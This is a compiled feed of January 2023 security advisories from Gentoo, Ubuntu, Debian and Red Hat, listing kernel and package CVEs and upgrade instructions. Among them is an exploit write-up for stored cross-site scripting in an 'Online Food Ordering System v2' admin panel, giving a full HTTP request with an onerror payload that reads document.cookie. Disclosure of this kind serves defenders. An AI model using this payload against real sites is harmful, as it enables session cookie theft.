Gentoo Linux Security Advisory 202301-7 - Multiple vulnerabilities have been found in Alpine, the worst of which could result in denial of service. Versions less than 2.25 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202301-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Alpine: Multiple Vulnerabilities  
     Date: January 11, 2023  
     Bugs: #807613  
       ID: 202301-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Alpine, the worst of which  
could result in denial of service.

Background  
==========

Alpine is an easy to use text-based based mail and news client.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  mail-client/alpine         < 2.25                        >= 2.25

Description  
===========

Multiple vulnerabilities have been discovered in Alpine. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Alpine users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/alpine-2.25"

References  
==========

[ 1 ] CVE-2021-38370  
      https://nvd.nist.gov/vuln/detail/CVE-2021-38370  
[ 2 ] CVE-2021-46853  
      https://nvd.nist.gov/vuln/detail/CVE-2021-46853

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202301-07

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202301-07

Ubuntu Security Notice 5793-4 - It was discovered that the io_uring subsystem in the Linux kernel did not properly perform reference counting in some situations, leading to a use- after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the Android Binder IPC subsystem in the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5793-4  
January 10, 2023

linux-ibm vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-ibm: Linux kernel for IBM cloud systems

Details:

It was discovered that the io_uring subsystem in the Linux kernel did not  
properly perform reference counting in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-3910)

It was discovered that a race condition existed in the Android Binder IPC  
subsystem in the Linux kernel, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-20421)

David Leadbeater discovered that the netfilter IRC protocol tracking  
implementation in the Linux Kernel incorrectly handled certain message  
payloads in some situations. A remote attacker could possibly use this to  
cause a denial of service or bypass firewall filtering. (CVE-2022-2663)

It was discovered that the sound subsystem in the Linux kernel contained a  
race condition in some situations. A local attacker could use this to cause  
a denial of service (system crash). (CVE-2022-3303)

It was discovered that the Sunplus Ethernet driver in the Linux kernel  
contained a read-after-free vulnerability. An attacker could possibly use  
this to expose sensitive information (kernel memory) (CVE-2022-3541)

It was discovered that a memory leak existed in the Unix domain socket  
implementation of the Linux kernel. A local attacker could use this to  
cause a denial of service (memory exhaustion). (CVE-2022-3543)

It was discovered that the NILFS2 file system implementation in the Linux  
kernel did not properly deallocate memory in certain error conditions. An  
attacker could use this to cause a denial of service (memory exhaustion).  
(CVE-2022-3544, CVE-2022-3646)

Gwnaun Jung discovered that the SFB packet scheduling implementation in the  
Linux kernel contained a use-after-free vulnerability. A local attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2022-3586)

It was discovered that the hugetlb implementation in the Linux kernel  
contained a race condition in some situations. A local attacker could use  
this to cause a denial of service (system crash) or expose sensitive  
information (kernel memory). (CVE-2022-3623)

Khalid Masum discovered that the NILFS2 file system implementation in the  
Linux kernel did not properly handle certain error conditions, leading to a  
use-after-free vulnerability. A local attacker could use this to cause a  
denial of service or possibly execute arbitrary code. (CVE-2022-3649)

It was discovered that a race condition existed in the MCTP implementation  
in the Linux kernel, leading to a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-3977)

It was discovered that a race condition existed in the EFI capsule loader  
driver in the Linux kernel, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-40307)

Zheng Wang and Zhuorao Yang discovered that the RealTek RTL8712U wireless  
driver in the Linux kernel contained a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-4095)

It was discovered that a race condition existed in the SMSC UFX USB driver  
implementation in the Linux kernel, leading to a use-after-free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41849)

It was discovered that a race condition existed in the Roccat HID driver in  
the Linux kernel, leading to a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-41850)

It was discovered that the USB monitoring (usbmon) component in the Linux  
kernel did not properly set permissions on memory mapped in to user space  
processes. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2022-43750)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   linux-image-5.19.0-1014-ibm     5.19.0-1014.15  
   linux-image-ibm                 5.19.0.1014.11

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5793-4  
   https://ubuntu.com/security/notices/USN-5793-1  
   CVE-2022-20421, CVE-2022-2663, CVE-2022-3303, CVE-2022-3541,  
   CVE-2022-3543, CVE-2022-3544, CVE-2022-3586, CVE-2022-3623,  
   CVE-2022-3646, CVE-2022-3649, CVE-2022-3910, CVE-2022-3977,  
   CVE-2022-40307, CVE-2022-4095, CVE-2022-41849, CVE-2022-41850,  
   CVE-2022-43750

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-ibm/5.19.0-1014.15

Ubuntu Security Notice USN-5793-4

khugepaged on Linux races with rmap-based zap, races with GUP-fast, and fails to call MMU notifiers.

Linux khugepaged Race Conditions

Debian Linux Security Advisory 5312-1 - Several flaws have been discovered in libjettison-java, a collection of StAX parsers and writers for JSON. Specially crafted user input may cause a denial of service via out-of-memory or stack overflow errors.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5312-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
January 11, 2023                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : libjettison-java  
CVE ID         : CVE-2022-40149 CVE-2022-40150 CVE-2022-45685 CVE-2022-45693  
Debian Bug     : 1022553 1022554

Several flaws have been discovered in libjettison-java, a collection of StAX  
parsers and writers for JSON. Specially crafted user input may cause a denial  
of service via out-of-memory or stack overflow errors.

For the stable distribution (bullseye), these problems have been fixed in  
version 1.5.3-1~deb11u1.

We recommend that you upgrade your libjettison-java packages.

For the detailed security status of libjettison-java please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/libjettison-java

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmO97oVfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeR0UQ//VW/sWOrB6mUP+QjFOmcughGa1iPASra6x35ko0bXug2cs+wagC0zWsYE  
nSNJ8V1KPR6QAtftwdeefZLPZBNdMz/rd6EOg8MEfuyErKLYW7UUEIO10CsyezXP  
wXU0HY/U2J9GeL6lXO8ryqdvA1dOaqvPq1qPA9dDYEuJm4hMTemOtILdthfynBz6  
cFN8jDjoFg2zmU3p8c5Xr2KosHKPKK14TRtSwnAae/kqo4XRrEzzS6dJArg2HI+j  
rzKtjfhTWRA0rlnVKSTTMXwtp6GagSxLUYBV24Et/PI4SxB4tEmSfAfI1esWtURa  
/BHZg91rnU4pzQH3eGSr0CYJzXEqPdUoaPJNueQrSdJgSrI15T6LXsUfx3kOBl7H  
B3ln9wmQONrjqQu3OP6w74XM0xr6G/X4/+mIClv/kiVO/ymTaM7uEBf4su/KmTz3  
SBLIea+4yVjzTcp8ScdeLDENJHTp+u0alWXJ7NLmJOG4M84jBalafpqHeGGnnC2X  
FouqljeteUp74jykoOU8M7d8/Hoj+kp/KuMoa+avIngx7klhozZ2T/UthgkQ4uH8  
SH8VIhT6/upBPMMLHqVqvZBFB2Fj+ZrN79FYBrdHiLqeDDpXRDNmhXJN2I4KCTBi  
ZQZM2kGRw4wivIuz+yOHpXShTCzcksuivZg8leSdQ9DXi/9xfEo=  
=1lWy  
-----END PGP SIGNATURE-----

Debian Security Advisory 5312-1

Gentoo Linux Security Advisory 202301-6 - Multiple vulnerabilities have been discovered in liblouis, the worst of which could result in denial of service. Versions less than 3.22.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202301-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: liblouis: Multiple Vulnerabilities  
     Date: January 11, 2023  
     Bugs: #835093  
       ID: 202301-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in liblouis, the worst of  
which could result in denial of service.

Background  
==========

liblouis is an open-source braille translator and back-translator.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-libs/liblouis          < 3.22.0                    >= 3.22.0

Description  
===========

Multiple vulnerabilities have been discovered in liblouis. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All liblouis users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-libs/liblouis-3.22.0"

References  
==========

[ 1 ] CVE-2022-26981  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26981  
[ 2 ] CVE-2022-31783  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31783

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202301-06

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202301-06

Red Hat Security Advisory 2023-0058-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include an out of bounds write vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security update  
Advisory ID:       RHSA-2023:0058-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0058  
Issue date:        2023-01-10  
CVE Names:         CVE-2022-2639   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: openvswitch: integer underflow leads to out-of-bounds write in  
reserve_sfa_size() (CVE-2022-2639)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2084479 - CVE-2022-2639 kernel: openvswitch: integer underflow leads to out-of-bounds write in reserve_sfa_size()

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1):

Source:  
kernel-4.18.0-147.78.1.el8_1.src.rpm

aarch64:  
bpftool-4.18.0-147.78.1.el8_1.aarch64.rpm  
bpftool-debuginfo-4.18.0-147.78.1.el8_1.aarch64.rpm  
kernel-4.18.0-147.78.1.el8_1.aarch64.rpm  
kernel-core-4.18.0-147.78.1.el8_1.aarch64.rpm  
kernel-cross-headers-4.18.0-147.78.1.el8_1.aarch64.rpm  
kernel-debug-4.18.0-147.78.1.el8_1.aarch64.rpm  
kernel-debug-core-4.18.0-147.78.1.el8_1.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-147.78.1.el8_1.aarch64.rpm  
kernel-debug-devel-4.18.0-147.78.1.el8_1.aarch64.rpm  
kernel-debug-modules-4.18.0-147.78.1.el8_1.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-147.78.1.el8_1.aarch64.rpm  
kernel-debuginfo-4.18.0-147.78.1.el8_1.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-147.78.1.el8_1.aarch64.rpm  
kernel-devel-4.18.0-147.78.1.el8_1.aarch64.rpm  
kernel-headers-4.18.0-147.78.1.el8_1.aarch64.rpm  
kernel-modules-4.18.0-147.78.1.el8_1.aarch64.rpm  
kernel-modules-extra-4.18.0-147.78.1.el8_1.aarch64.rpm  
kernel-tools-4.18.0-147.78.1.el8_1.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-147.78.1.el8_1.aarch64.rpm  
kernel-tools-libs-4.18.0-147.78.1.el8_1.aarch64.rpm  
perf-4.18.0-147.78.1.el8_1.aarch64.rpm  
perf-debuginfo-4.18.0-147.78.1.el8_1.aarch64.rpm  
python3-perf-4.18.0-147.78.1.el8_1.aarch64.rpm  
python3-perf-debuginfo-4.18.0-147.78.1.el8_1.aarch64.rpm

noarch:  
kernel-abi-whitelists-4.18.0-147.78.1.el8_1.noarch.rpm  
kernel-doc-4.18.0-147.78.1.el8_1.noarch.rpm

ppc64le:  
bpftool-4.18.0-147.78.1.el8_1.ppc64le.rpm  
bpftool-debuginfo-4.18.0-147.78.1.el8_1.ppc64le.rpm  
kernel-4.18.0-147.78.1.el8_1.ppc64le.rpm  
kernel-core-4.18.0-147.78.1.el8_1.ppc64le.rpm  
kernel-cross-headers-4.18.0-147.78.1.el8_1.ppc64le.rpm  
kernel-debug-4.18.0-147.78.1.el8_1.ppc64le.rpm  
kernel-debug-core-4.18.0-147.78.1.el8_1.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-147.78.1.el8_1.ppc64le.rpm  
kernel-debug-devel-4.18.0-147.78.1.el8_1.ppc64le.rpm  
kernel-debug-modules-4.18.0-147.78.1.el8_1.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-147.78.1.el8_1.ppc64le.rpm  
kernel-debuginfo-4.18.0-147.78.1.el8_1.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-147.78.1.el8_1.ppc64le.rpm  
kernel-devel-4.18.0-147.78.1.el8_1.ppc64le.rpm  
kernel-headers-4.18.0-147.78.1.el8_1.ppc64le.rpm  
kernel-modules-4.18.0-147.78.1.el8_1.ppc64le.rpm  
kernel-modules-extra-4.18.0-147.78.1.el8_1.ppc64le.rpm  
kernel-tools-4.18.0-147.78.1.el8_1.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-147.78.1.el8_1.ppc64le.rpm  
kernel-tools-libs-4.18.0-147.78.1.el8_1.ppc64le.rpm  
perf-4.18.0-147.78.1.el8_1.ppc64le.rpm  
perf-debuginfo-4.18.0-147.78.1.el8_1.ppc64le.rpm  
python3-perf-4.18.0-147.78.1.el8_1.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-147.78.1.el8_1.ppc64le.rpm

s390x:  
bpftool-4.18.0-147.78.1.el8_1.s390x.rpm  
bpftool-debuginfo-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-core-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-cross-headers-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-debug-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-debug-core-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-debug-debuginfo-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-debug-devel-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-debug-modules-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-debug-modules-extra-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-debuginfo-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-devel-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-headers-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-modules-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-modules-extra-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-tools-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-tools-debuginfo-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-zfcpdump-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-zfcpdump-core-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-147.78.1.el8_1.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-147.78.1.el8_1.s390x.rpm  
perf-4.18.0-147.78.1.el8_1.s390x.rpm  
perf-debuginfo-4.18.0-147.78.1.el8_1.s390x.rpm  
python3-perf-4.18.0-147.78.1.el8_1.s390x.rpm  
python3-perf-debuginfo-4.18.0-147.78.1.el8_1.s390x.rpm

x86_64:  
bpftool-4.18.0-147.78.1.el8_1.x86_64.rpm  
bpftool-debuginfo-4.18.0-147.78.1.el8_1.x86_64.rpm  
kernel-4.18.0-147.78.1.el8_1.x86_64.rpm  
kernel-core-4.18.0-147.78.1.el8_1.x86_64.rpm  
kernel-cross-headers-4.18.0-147.78.1.el8_1.x86_64.rpm  
kernel-debug-4.18.0-147.78.1.el8_1.x86_64.rpm  
kernel-debug-core-4.18.0-147.78.1.el8_1.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-147.78.1.el8_1.x86_64.rpm  
kernel-debug-devel-4.18.0-147.78.1.el8_1.x86_64.rpm  
kernel-debug-modules-4.18.0-147.78.1.el8_1.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-147.78.1.el8_1.x86_64.rpm  
kernel-debuginfo-4.18.0-147.78.1.el8_1.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-147.78.1.el8_1.x86_64.rpm  
kernel-devel-4.18.0-147.78.1.el8_1.x86_64.rpm  
kernel-headers-4.18.0-147.78.1.el8_1.x86_64.rpm  
kernel-modules-4.18.0-147.78.1.el8_1.x86_64.rpm  
kernel-modules-extra-4.18.0-147.78.1.el8_1.x86_64.rpm  
kernel-tools-4.18.0-147.78.1.el8_1.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-147.78.1.el8_1.x86_64.rpm  
kernel-tools-libs-4.18.0-147.78.1.el8_1.x86_64.rpm  
perf-4.18.0-147.78.1.el8_1.x86_64.rpm  
perf-debuginfo-4.18.0-147.78.1.el8_1.x86_64.rpm  
python3-perf-4.18.0-147.78.1.el8_1.x86_64.rpm  
python3-perf-debuginfo-4.18.0-147.78.1.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2639  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY73n8tzjgjWX9erEAQiZug//cICKYCsZqTkEfUyxjip8h1JXgG0Kg4/X  
M4LVTKHpJ9fa3dFr2ZpM1C0sGDyj/pHXtB2EvUHXMiHvU2LnhmXhxtfYW1JIlqzl  
I6mA5t/IoM0BEjOb50FH5cML6+PL5krQFt/0iFJnkC606toYwe8XsT07uFKslhj7  
k3CvOVWqYvpRrRR9nES8VU+KEuGQHIE1iCvLfq87jASyoD3Tqqwy+SLv4aqfYANX  
zbaqihP6VFTZwsEZ6QFliux/hPRoMIatswra8nE7p2vwmrC4z/ithEaSjbQhBkMi  
iJPoGxkE0Cg5MgHq2z/KM9OwVcr4p6RlChZaiM6P/oxOBf5gN0M10e1N+aQsSWjE  
igv1rWnM0GMEkJshrVCq0ub9ndv8LUsy165hgXe82Bf2Y2lfAP6eA9M5nUgZSQOY  
Wl4NqMyS+cVPiV3q7QCm9m9PdhJ2ZFoQzr1YbVPRKk2q6OMy1fh1P6Z6/BVuXl38  
0d6FfC58yHcGzofeY7TxuTbs1r548cgQTPh1vXzIS3M6+UNJaBb4fxK+jwKu7pXZ  
VZ576e1sBAEx0IOuWZJ3Aj0xQeSlgN9LBL01p/PsnV+8tsfOsiMJwPB7V7lCm1eV  
2FTcgB0JIPsgaxu32btAmXfOBixECPEwodgqmIbDXzBFpa4U77EgE+mMr+Ml58cv  
yOz1/rG28ok=  
=DQEM  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0058-01

Online Food Ordering System version 2.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Online Food Ordering System v2 - Stored Cross Site Scripting (XSS)# Date: 01/11/2023# Exploit Author: Alaeddin Berksoy# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code# Version: 2.0 # Tested on: Macos / XAMPPPOST /fos/admin/ajax.php?action=save_category HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------212007370016574149261512413130Content-Length: 322Origin: http://localhostConnection: closeReferer: http://localhost/fos/admin/index.php?page=categoriesCookie: language=en; welcomebanner_status=dismiss; continueCode=LoPJXWEAqruytmUYHrT4FDiBZikOH1Vh8Zh7JHvLtppI9VCvXHEYd7ywQ1B5; cookieconsent_status=dismiss; PHPSESSID=eje1menuonpvjtfbl2ri965btkSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------212007370016574149261512413130Content-Disposition: form-data; name="id"-----------------------------212007370016574149261512413130Content-Disposition: form-data; name="name"<img src onerror=alert(document.cookie);>-----------------------------212007370016574149261512413130--

Online Food Ordering System 2.0 Cross Site Scripting

Gentoo Linux Security Advisory 202301-5 - A vulnerability has been discovered in Apache Commons Text which could result in arbitrary code execution. Versions less than 1.10.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202301-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Apache Commons Text: Arbitrary Code Execution  
     Date: January 11, 2023  
     Bugs: #877577  
       ID: 202301-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Apache Commons Text which could  
result in arbitrary code execution.

Background  
==========

Apache Commons Text is a library focused on algorithms working on  
strings.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-java/commons-text      < 1.10.0                    >= 1.10.0

Description  
===========

Apache Commons Text performs variable interpolation, allowing properties  
to be dynamically evaluated and expanded. The standard format for  
interpolation is "${prefix:name}", where "prefix" is used to locate an  
instance of org.apache.commons.text.lookup.StringLookup that performs  
the interpolation. The set of default Lookup instances included  
interpolators that could result in arbitrary code execution or contact  
with remote servers. These lookups are: - "script" - execute expressions  
using the JVM script execution engine (javax.script) - "dns" - resolve  
dns records - "url" - load values from urls, including from remote  
servers Applications using the interpolation defaults in the affected  
versions may be vulnerable to remote code execution or unintentional  
contact with remote servers if untrusted configuration values are used.

Impact  
======

Crafted input to Apache Commons Text could trigger remote code  
execution.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Apache Commons Text users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-java/commons-text-1.10.0"

References  
==========

[ 1 ] CVE-2022-42889  
      https://nvd.nist.gov/vuln/detail/CVE-2022-42889

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202301-05

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202301-05

Ubuntu Security Notice 5791-3 - It was discovered that a race condition existed in the Android Binder IPC subsystem in the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. David Leadbeater discovered that the netfilter IRC protocol tracking implementation in the Linux Kernel incorrectly handled certain message payloads in some situations. A remote attacker could possibly use this to cause a denial of service or bypass firewall filtering.

==========================================================================  
Ubuntu Security Notice USN-5791-3  
January 10, 2023

linux-azure-5.4, linux-azure-fde vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-azure-fde: Linux kernel for Microsoft Azure CVM cloud systems  
- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systems

Details:

It was discovered that a race condition existed in the Android Binder IPC  
subsystem in the Linux kernel, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-20421)

David Leadbeater discovered that the netfilter IRC protocol tracking  
implementation in the Linux Kernel incorrectly handled certain message  
payloads in some situations. A remote attacker could possibly use this to  
cause a denial of service or bypass firewall filtering. (CVE-2022-2663)

It was discovered that the Intel 740 frame buffer driver in the Linux  
kernel contained a divide by zero vulnerability. A local attacker could use  
this to cause a denial of service (system crash). (CVE-2022-3061)

It was discovered that the sound subsystem in the Linux kernel contained a  
race condition in some situations. A local attacker could use this to cause  
a denial of service (system crash). (CVE-2022-3303)

Gwnaun Jung discovered that the SFB packet scheduling implementation in the  
Linux kernel contained a use-after-free vulnerability. A local attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2022-3586)

It was discovered that the NILFS2 file system implementation in the Linux  
kernel did not properly deallocate memory in certain error conditions. An  
attacker could use this to cause a denial of service (memory exhaustion).  
(CVE-2022-3646)

Hyunwoo Kim discovered that an integer overflow vulnerability existed in  
the PXA3xx graphics driver in the Linux kernel. A local attacker could  
possibly use this to cause a denial of service (system crash).  
(CVE-2022-39842)

It was discovered that a race condition existed in the EFI capsule loader  
driver in the Linux kernel, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-40307)

Zheng Wang and Zhuorao Yang discovered that the RealTek RTL8712U wireless  
